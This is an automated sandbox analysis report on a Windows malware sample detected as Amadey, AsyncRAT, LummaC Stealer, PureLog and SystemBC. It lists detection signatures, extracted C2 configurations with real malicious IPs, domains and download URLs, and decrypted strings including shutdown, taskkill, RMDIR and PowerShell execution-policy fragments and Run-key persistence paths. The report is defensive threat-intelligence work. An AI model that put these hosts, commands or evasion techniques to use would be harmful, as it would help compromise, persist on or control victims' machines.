Windows Analysis Report
DhqvS8pXj8.exe

Overview

General Information

Sample name: DhqvS8pXj8.exe (renamed because original name is a hash value)
Original sample name: 582f90039d305a4706f8556ac74dcb90.exe
Analysis ID: 1612327
MD5: 582f90039d305a4706f8556ac74dcb90
SHA1: 39f2454fcdd5ffd812034b5e3b8b7183722214ec
SHA256: 7676247d21cfeaa362f445d12ae1985db713e69f59bd512fb6d69b7c38faf5f4
Tags: exe, user-abuse_ch

Detection

Amadey, AsyncRAT, Healer AV Disabler, LummaC Stealer, PureLog Stealer, SystemBC
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Healer AV Disabler
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected SystemBC
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates HTA files
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart (image not reproduced): categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: SystemBC
Description: SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC. SystemBC has been observed occasionally, but more pronounced since June 2019. The first samples go back to October 2018.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

AV Detection

Source: DhqvS8pXj8.exe Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.php001 Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/5765828710/ViGgA8C.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/ReverseSheller/random.exe Avira URL Cloud: Label: malware
Source: pleasedcfrown.biz Avira URL Cloud: Label: malware
Source: suggestyuoz.biz Avira URL Cloud: Label: malware
Source: edcatiofireeu.shop Avira URL Cloud: Label: malware
Source: impolitewearr.biz Avira URL Cloud: Label: malware
Source: affordtempyo.biz Avira URL Cloud: Label: malware
Source: hoursuhouy.biz Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/c0dxnfz/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/6158422886/r7MRNUY.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/7244183739/L5shRfh.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.75/files/asjduwgsgausi/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/none/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpER Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/rast333a/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php~ Avira URL Cloud: Label: malware
Source: lightdeerysua.biz Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/5643377291/7fOMOTQ.exe Avira URL Cloud: Label: malware
Source: mixedrecipew.biz Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/fate/random.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["pleasedcfrown.biz", "affordtempyo.biz", "mixedrecipew.biz", "hoursuhouy.biz", "suggestyuoz.biz", "lightdeerysua.biz", "toppyneedus.biz", "impolitewearr.biz", "edcatiofireeu.shop"], "Build id": "Jxy8Jp--new"}
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: 66.2.fbpbh.exe.33c0690.0.unpack Malware Configuration Extractor: SystemBC {"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org", "DNS1": "5.132.191.104", "DNS2": "ns1.vic.au.dns.opennic.glue", "DNS3": "ns2.vic.au.dns.opennic.glue"}
Source: C:\ProgramData\jhbbvnx\fbpbh.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe Virustotal: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Joe Sandbox ML: detected
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: DhqvS8pXj8.exe Joe Sandbox ML: detected
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: pleasedcfrown.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: affordtempyo.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: mixedrecipew.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: hoursuhouy.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: suggestyuoz.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: lightdeerysua.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: toppyneedus.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: impolitewearr.biz
Source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: edcatiofireeu.shop
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: 185.215.113.43
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: S-%lu-
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: abc3bc1985
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: skotes.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Startup
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: rundll32
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Programs
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: %USERPROFILE%
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: cred.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: clip.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: http://
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: https://
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: /quiet
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: /Plugins/
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: &unit=
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: shell32.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: kernel32.dll
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: GetNativeSystemInfo
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: ProgramData\
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: AVAST Software
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Kaspersky Lab
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Panda Security
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Doctor Web
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: 360TotalSecurity
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Bitdefender
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Norton
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Sophos
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Comodo
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: WinDefender
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: 0123456789
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: ------
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: ?scr=1
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: ComputerName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: -unicode-
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: VideoID
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: ProductName
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: CurrentBuild
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: rundll32.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: "taskkill /f /im "
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: " && timeout 1 && del
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: && Exit"
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: " && ren
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: Powershell.exe
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: shutdown -s -t 0
Source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp String decryptor: random
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: 7707
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: 159.100.19.137
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: 0.5.8
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: false
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: yBu0GW2G5zAc
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: 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
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: null
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp String decryptor: Default
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: 7707
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: 159.100.19.137
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: 0.5.8
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: yBu0GW2G5zAc
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: 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
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: 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
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: null
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack String decryptor: Default

Phishing

Source: Yara match File source: Process Memory Space: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE PID: 1436, type: MEMORYSTR
Source: Yara match File source: C:\Temp\v468GkyBl.hta, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta, type: DROPPED
Source: Yara match File source: C:\Temp\i2GY6vn5L.hta, type: DROPPED
Source: DhqvS8pXj8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
